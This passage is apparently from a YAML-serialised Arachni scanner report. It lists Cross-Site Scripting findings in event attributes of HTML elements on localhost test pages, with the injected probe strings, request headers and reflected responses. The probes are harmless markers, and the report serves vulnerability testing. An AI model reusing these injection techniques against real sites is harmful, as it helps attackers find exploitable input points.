    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onabort
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onabort="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onabort
      :id: <a href="/" onabort="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onabort=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onabort</a><a href='/' onabort="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a><a href='/' onabort='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onabort</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onabort
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onkeydown
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "421"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeydown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onkeydown
      :id: <a href="/" onkeydown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeydown=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeydown</a><a href='/' onkeydown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a><a href='/' onkeydown='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeydown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onkeydown
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onkeypress
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "427"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeypress="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onkeypress
      :id: <a href="/" onkeypress="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeypress=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeypress</a><a href='/' onkeypress="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a><a href='/' onkeypress='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeypress</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onkeypress
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onkeyup
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeyup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onkeyup
      :id: <a href="/" onkeyup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeyup=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeyup</a><a href='/' onkeyup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a><a href='/' onkeyup='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeyup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onkeyup
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onclick
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onclick
      :id: <a href="/" onclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onclick=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onclick</a><a href='/' onclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a><a href='/' onclick='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onclick
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/ondblclick
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "427"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" ondblclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/ondblclick
      :id: <a href="/" ondblclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' ondblclick=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>ondblclick</a><a href='/' ondblclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a><a href='/' ondblclick='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>ondblclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/ondblclick
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onmousedown
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousedown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onmousedown
      :id: <a href="/" onmousedown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousedown=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousedown</a><a href='/' onmousedown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a><a href='/' onmousedown='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousedown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onmousedown
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onmousemove
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
